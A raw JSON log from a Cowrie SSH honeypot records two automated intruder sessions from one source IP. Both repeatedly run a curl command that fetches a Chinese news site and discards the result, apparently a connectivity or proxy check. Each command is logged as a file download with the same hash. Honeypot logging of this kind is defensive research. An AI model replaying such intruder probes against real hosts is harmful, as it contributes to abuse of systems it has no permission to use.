{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:54.278280Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:54.285339Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:54.286500Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:54.290233Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:54.291468Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:54.300835Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:54.308254Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:54.311649Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:54.325011Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:54.326121Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:54.328807Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:54.329757Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:54.350532Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:54.363153Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:54.364523Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:54.366804Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:54.367623Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:54.369928Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:54.392542Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:54.401916Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:54.402797Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:54.421961Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:54.423662Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:54.425320Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:54.430617Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:54.437221Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:54.443536Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:54.455068Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:54.455926Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:54.460696Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:54.461834Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:54.472003Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:54.494977Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:54.495975Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:54.500432Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:54.501243Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:54.503816Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:54.513791Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:54.522862Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:54.533550Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:54.534581Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:54.536985Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:54.537890Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:54.551471Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:54.563172Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:54.573352Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:54.574630Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:54.578025Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:54.578800Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:54.586780Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:54.601279Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:54.612334Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:54.613524Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:54.616991Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:54.617760Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:54.649592Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:54.651986Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:54.653243Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:54.658942Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:54.660028Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:54.665201Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:54.668031Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:54.681499Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:54.689707Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:54.690727Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:54.692350Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:54.698514Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:54.699525Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:54.709946Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:54.719034Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:54.726912Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:54.727952Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:54.738604Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:54.739522Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:54.762758Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:54.763753Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:54.769429Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:54.772273Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:54.775862Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:54.776747Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:54.797965Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:54.800117Z","src_ip":"212.227.125.160","session":"7541ed730449"}
